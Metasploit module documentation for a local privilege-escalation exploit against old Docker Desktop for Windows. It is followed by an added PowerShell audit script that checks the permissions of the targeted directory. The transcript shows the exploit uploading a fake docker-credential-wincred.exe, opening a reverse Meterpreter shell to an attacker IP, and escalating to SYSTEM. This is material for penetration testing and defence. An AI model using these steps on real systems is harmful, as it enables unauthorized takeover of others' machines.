Docker Credential Wincred

documentation/modules/exploit/windows/local/docker_credential_wincred.md

Vulnerable Application

Docker Desktop Community Edition before 2.1.0.1. Installer: https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe

Verification Steps

  1. Install Docker Desktop Community Edition before 2.1.0.1
  2. Start msfconsole
  3. Get a session with basic privileges
  4. Do: use exploit/windows/local/docker_credential_wincred
  5. Do: set SESSION <sess_no>
  6. Do: run
  7. Using an administrator cmd shell on the target, run docker login
  8. You should get a shell you can elevate with getsystem.

Scenarios

Tested on Docker Community Edition 2.0.0.0 running on Windows 10 x64 Release 1803

msf exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

 Name         Current Setting                            Required  Description
 ----         ---------------                            --------  -----------
 PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
 SESSION                                                 yes       The session to run this module on.


Exploit target:

 Id  Name
 --  ----
 0   Automatic


msf exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
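
The run above writes docker-credential-wincred.exe into the version-bin directory from a session with basic privileges. The following PowerShell audit is an added example, not part of the module or its documentation: it reports which principals can write to that directory and, if the helper binary is present there, its owner, signature status and hash. The list of trusted principals is an assumption to adjust for the environment.

```powershell
# Added defensive example; not from the Metasploit module documentation.
param(
    # Default matches the PROGRAMDATA option shown in the module options above.
    [string]$VersionBin = 'C:\ProgramData\DockerDesktop\version-bin'
)

$helper = Join-Path $VersionBin 'docker-credential-wincred.exe'

# Assumption: only these principals should be able to write here.
$trusted = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller',
    'CREATOR OWNER'   # applies only to objects the creator already owns
)

# Write-type rights only (Modify/FullControl would also match read bits),
# plus the raw GENERIC_WRITE and GENERIC_ALL bits some ACEs carry.
$rights    = [System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$writeMask = [int]$rights -bor 0x50000000

if (-not (Test-Path -LiteralPath $VersionBin -PathType Container)) {
    Write-Output "Directory not found: $VersionBin"
    return
}

# 1. Who can create or replace files in the directory?
$risky = (Get-Acl -LiteralPath $VersionBin).Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    ([int]$_.FileSystemRights -band $writeMask) -ne 0 -and
    $trusted -notcontains $_.IdentityReference.Value
}
foreach ($ace in $risky) {
    Write-Warning ("Writable by {0}: {1}" -f $ace.IdentityReference, $ace.FileSystemRights)
}

# 2. If the credential helper exists here, record who owns it and whether it is signed.
if (Test-Path -LiteralPath $helper -PathType Leaf) {
    $sig = Get-AuthenticodeSignature -LiteralPath $helper
    [pscustomobject]@{
        Path            = $helper
        Owner           = (Get-Acl -LiteralPath $helper).Owner
        SignatureStatus = $sig.Status
        Signer          = $sig.SignerCertificate.Subject
        SHA256          = (Get-FileHash -LiteralPath $helper -Algorithm SHA256).Hash
        CreatedUtc      = (Get-Item -LiteralPath $helper).CreationTimeUtc
    }
} else {
    Write-Output "No docker-credential-wincred.exe in $VersionBin"
}
```

A warning from step 1 combined with an unsigned or non-administrator-owned file in step 2 is the condition the scenario above relies on.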